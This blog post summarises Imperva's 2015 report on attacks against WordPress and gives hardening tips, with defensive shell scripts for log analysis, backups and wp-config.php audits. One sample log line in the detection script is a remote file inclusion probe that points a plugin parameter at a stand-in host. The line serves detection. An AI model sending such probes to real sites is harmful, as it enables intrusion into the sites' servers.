Imperva WAAR Report 2015: WordPress attacks highest of all CMS’s

Security attacks on websites and blogs are higher than ever before. According to Imperva’s new Web Application Attacks Report, Content Management Systems (CMS’s) were attacked three times more often than other Web applications. The data security firm found that WordPress alone was, unfortunately, attacked 3.5 times more often than the others.

It comes as no surprise that WordPress is the most attacked CMS. Not only is it the most popular platform, but new data from W3Techs, which measures both usage and market share, reported last week that WordPress accounts for a quarter of the web. They said, “WordPress is used by 58.7% of all the websites whose content management system we know. This is 25.0% of all websites.”

As 2015 draws to a close, WordPress has taken a real beating this year, with a rise in brute-force attacks. Hackers and malware are doing a lot of damage by exploiting vulnerabilities in the 30,000+ plugins available for WordPress.

Imperva’s report said, “CMS frameworks are mostly open source, with communities of developers continuously generating sequences of plugins and add-ons, without concerted focus towards security. This developer model constantly increases the vulnerabilities in CMS applications, especially for WordPress which is also PHP based.”

Non-CMS applications were less susceptible to remote command execution (RCE) attacks than CMS’s, according to the report’s findings. Furthermore, the report found that WordPress is five times more likely than other CMS’s to be hit by remote file inclusion (RFI) attacks.

Some of the trends in Imperva’s annual report continue from last year’s report, such as the increase in SQL Injection (SQLi) and Cross-Site Scripting (XSS) attacks and the growth in attacks on WordPress. A newcomer this year is the mega-trend of Shellshock Remote Code Execution (RCE) attacks, which scanned every kind of web application alike.
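The report counts two of the patterns above, brute-force logins and RFI probes, as the ones WordPress sees most. The script below is an added example (not from the article or from Imperva) showing how a site owner can spot both in an ordinary combined-format Apache or Nginx access log. The log lines, the IP addresses (documentation ranges) and the threshold of five attempts are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the article or from Imperva's report: flag two of the
# attack patterns the report attributes to WordPress, login brute-forcing and
# remote file inclusion (RFI) probes, in combined-format web server access logs.
# The log lines, IP addresses (documentation ranges) and threshold are constructed.

SAMPLE_LOG='198.51.100.7 - - [10/Dec/2015:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3825 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2015:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3825 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2015:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3825 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2015:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3825 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2015:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3825 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2015:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2015:10:01:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.44 - - [10/Dec/2015:10:02:00 +0000] "GET /wp-content/plugins/example/view.php?page=http://203.0.113.44/x.txt HTTP/1.1" 404 210 "-" "curl/7.40"
203.0.113.44 - - [10/Dec/2015:10:02:01 +0000] "GET /index.php HTTP/1.1" 200 15000 "-" "curl/7.40"'

# login_bruteforce [threshold]   (log on stdin, default threshold 5)
# Prints "<ip> <failed-posts>" for each client with at least <threshold> failed
# logins. A failed WordPress login re-renders the form with HTTP 200, while a
# successful one redirects (302), so counting 200s on POST /wp-login.php isolates
# failures. Fields: $1 client IP, $6 method (with leading quote), $7 path, $9 status.
login_bruteforce() {
    awk -v t="${1:-5}" '
        $6 ~ /POST/ && $7 ~ /^\/wp-login\.php/ && $9 == "200" { fails[$1]++ }
        END { for (ip in fails) if (fails[ip] >= t) print ip, fails[ip] }'
}

# rfi_candidates   (log on stdin)
# Prints "<ip> <path>" for requests that pass a full URL as a query parameter,
# the shape of an RFI probe against a plugin that includes a user-supplied file.
rfi_candidates() {
    awk '$7 ~ /[?&][^=&]+=https?:\/\// { print $1, $7 }'
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | login_bruteforce 5
printf '%s\n' "$SAMPLE_LOG" | rfi_candidates
```

On a live server pipe the real log in (for example `login_bruteforce 20 < /var/log/apache2/access.log`, path assumed) and pre-filter on the timestamp field so the count covers a window rather than the whole file; the flagged addresses are what you would hand to fail2ban or a firewall rule.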

The report said, “We conclude that the increasing availability of web attack tools and services—with computational power becoming less expensive and ubiquitous—are driving the new wave of volumetric malicious attacks. The evolution of attacks against web applications has continued with increased sophistication, magnitude, and velocity. However, there is hope thanks to the growing effectiveness of reputation-based detection mechanisms, and their ability to identify attacks by tracking previously identified malicious activity to its origins.”


4 Simple Ways to Protect your WordPress Site from Viruses, Malware and Hackers

Almost all of our clients have been targeted by a malicious attack on their WordPress site. When they first come to us, they are in utter panic, stressed and quite confused about what to do. Only after we do our job and restore their site to its former virus-free glory does colour return to their faces and they begin to calm down.

It pains us to see our clients go through so much worry when they could have avoided the disaster by taking only a few preventative steps. You can save yourself from a major fiasco if you follow the steps we’ve outlined below to help protect your WordPress site from viruses, malware and hacker attacks:

1. Update your site’s theme & plugins

Updates for WordPress and its plugins are frequently released by their official teams. These updates contain fixes for freshly discovered security loopholes to prevent possible attacks. So make sure you regularly update your site.


2. Backup

An extremely important task in managing your site is backing it up regularly, especially before making changes. You can use a plugin or do it manually. If your site does unfortunately get compromised, your backup files let you restore it, or switch hosts, and be back up and running in no time.
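Tips 1 and 2 belong together: take a backup, then update. The script below is an added example, not the agency’s or WordPress’s own tooling. It assumes a WordPress install at the directory you pass in, WP-CLI (the `wp` command) for the updates, and, for the database dump, credentials exported as WP_DB_NAME, WP_DB_USER and WP_DB_PASS (a naming convention chosen here, not a WordPress standard).

```shell
#!/bin/sh
# Added example, not from the article: take a verified backup of a WordPress
# install and only then apply core, plugin and theme updates. Paths, the WP_DB_*
# environment variables and the use of WP-CLI ("wp") are assumptions.
set -u

# wp_backup <wordpress_dir> <backup_dir>
# Archives the whole install into a timestamped tar.gz, adds a database dump when
# WP_DB_NAME/WP_DB_USER/WP_DB_PASS are exported and mysqldump is available, and
# verifies the archive can be read back. Prints the archive path on success.
# Keep <backup_dir> outside the web root (and outside <wordpress_dir>): the
# archive contains wp-config.php and therefore the database password.
wp_backup() {
    src=$1
    dest=$2
    stamp=$(date -u +%Y%m%dT%H%M%SZ)
    archive="$dest/wordpress-$stamp.tar.gz"
    dbdump=""
    mkdir -p "$dest" || return 1

    if [ -n "${WP_DB_NAME:-}" ] && command -v mysqldump >/dev/null 2>&1; then
        # Credentials go through a mode-600 defaults file, never the command line,
        # so they do not show up in `ps` for other users on the host.
        cnf=$(mktemp) || return 1
        chmod 600 "$cnf"
        printf '[client]\nuser=%s\npassword=%s\n' "${WP_DB_USER:?}" "${WP_DB_PASS:?}" > "$cnf"
        dbdump="db-$stamp.sql"
        mysqldump --defaults-extra-file="$cnf" --single-transaction "$WP_DB_NAME" \
            > "$dest/$dbdump"
        rc=$?
        rm -f "$cnf"
        [ "$rc" -eq 0 ] || return 1
    fi

    # Relative paths inside the archive; the dump (if any) is picked up from $dest.
    if [ -n "$dbdump" ]; then
        tar -czf "$archive" -C "$src" . -C "$dest" "$dbdump" || return 1
    else
        tar -czf "$archive" -C "$src" . || return 1
    fi
    chmod 600 "$archive"

    # An archive that cannot be listed is not a backup.
    tar -tzf "$archive" >/dev/null 2>&1 || return 1
    printf '%s\n' "$archive"
}

# wp_update <wordpress_dir>
# Applies updates with WP-CLI. Returns 2 when wp is not installed so the caller
# can tell "no tooling" apart from a failed update.
wp_update() {
    command -v wp >/dev/null 2>&1 || return 2
    wp --path="$1" core update && \
        wp --path="$1" plugin update --all && \
        wp --path="$1" theme update --all
}

# safe_update <wordpress_dir> <backup_dir>: never update without a fresh backup.
safe_update() {
    archive=$(wp_backup "$1" "$2") || { echo "backup failed; not updating" >&2; return 1; }
    echo "backup written to $archive"
    wp_update "$1"
    rc=$?
    [ "$rc" -eq 2 ] && echo "wp not found; apply the updates from the dashboard instead" >&2
    return "$rc"
}

# Usage: safe_update.sh /path/to/wordpress /path/to/backups
if [ $# -eq 2 ]; then
    safe_update "$1" "$2"
fi
```

Run it from cron before the weekly update round; if the backup step fails the updates are skipped, which is the point of the ordering.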


3. Change the login and password from admin

By default the WordPress username is admin. Create a unique username that is neither obvious nor easy to guess; including numbers is a good idea. The same goes for the password: set a long password with a mix of upper- and lower-case letters, numbers and symbols.


4. Hide or secure wp-config.php 

The wp-config.php file holds your site’s configuration and its most sensitive data (the database credentials), which makes it a prime target. You can protect it by adding the following rules to the .htaccess file in the root directory of your WordPress install; they make the web server deny everyone access to the file:

# protect wp-config.php
# (Apache 2.2 syntax; on Apache 2.4 replace the two Order/Deny lines with "Require all denied")
<files wp-config.php>
Order deny,allow
Deny from all
</files>

You can also move it one directory above the WordPress install, from its default location at host/wordpress/wp-config.php to host/wp-config.php, for added protection; WordPress looks for the file in the parent directory automatically.
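A quick way to confirm that tip 4 actually took effect is to audit the file on disk. The script below is an added example (not the article’s or WordPress’s code) that checks the file’s permissions, looks for the .htaccess rule above, and handles the moved-one-level-up layout; the directory layout it expects is an assumption.

```shell
#!/bin/sh
# Added example, not from the article: audit how exposed wp-config.php is on disk.
# Checks (1) that the file is not readable by "other" users, (2) that the site's
# .htaccess carries a deny rule for it, and (3) that no copy was left behind in the
# install dir after moving the file one level up (WordPress loads wp-config.php
# from the parent directory when it is absent from the install itself).
# The directory layout is an assumption.

# wpconfig_audit <wordpress_dir>
# Prints one "OK"/"WARN" line per check; returns 1 if any check warns.
wpconfig_audit() {
    site=$1
    parent=$(dirname "$site")
    rc=0

    # Locate the live config: install dir first, then parent (WordPress's own order).
    if [ -f "$site/wp-config.php" ]; then
        cfg="$site/wp-config.php"
    elif [ -f "$parent/wp-config.php" ]; then
        cfg="$parent/wp-config.php"
    else
        echo "WARN no wp-config.php found in $site or $parent"
        return 1
    fi

    # (1) Permission check: the DB password in this file must not be world-readable.
    # `ls -l` is portable; character 8 of the mode string is the "other" read bit.
    perms=$(ls -l "$cfg" | cut -c1-10)
    case $perms in
        ???????r??) echo "WARN $cfg is world-readable ($perms)"; rc=1 ;;
        *)          echo "OK   $cfg permissions $perms" ;;
    esac

    # (2) .htaccess rule: only meaningful while the file sits inside the install dir.
    if [ "$cfg" = "$site/wp-config.php" ]; then
        if [ -f "$site/.htaccess" ] && grep -qi 'wp-config\.php' "$site/.htaccess" \
           && grep -qiE 'deny from all|require all denied' "$site/.htaccess"; then
            echo "OK   .htaccess denies access to wp-config.php"
        else
            echo "WARN no .htaccess rule protecting wp-config.php in $site"; rc=1
        fi
    else
        echo "OK   wp-config.php lives outside the install dir ($cfg)"
    fi

    # (3) A copy left behind in the install dir after moving the file defeats the move.
    if [ -f "$site/wp-config.php" ] && [ -f "$parent/wp-config.php" ]; then
        echo "WARN wp-config.php exists in both $site and $parent"; rc=1
    fi
    return $rc
}

# Usage: wpconfig_audit.sh /path/to/wordpress
if [ $# -eq 1 ]; then
    wpconfig_audit "$1"
fi
```

Two caveats when reading the output: WordPress only falls back to the parent-directory copy when that directory is not itself a WordPress install (it checks for wp-settings.php there), and check (2) is Apache-specific; on Nginx the equivalent is a `location` block that returns 403 for the file, which this script does not inspect.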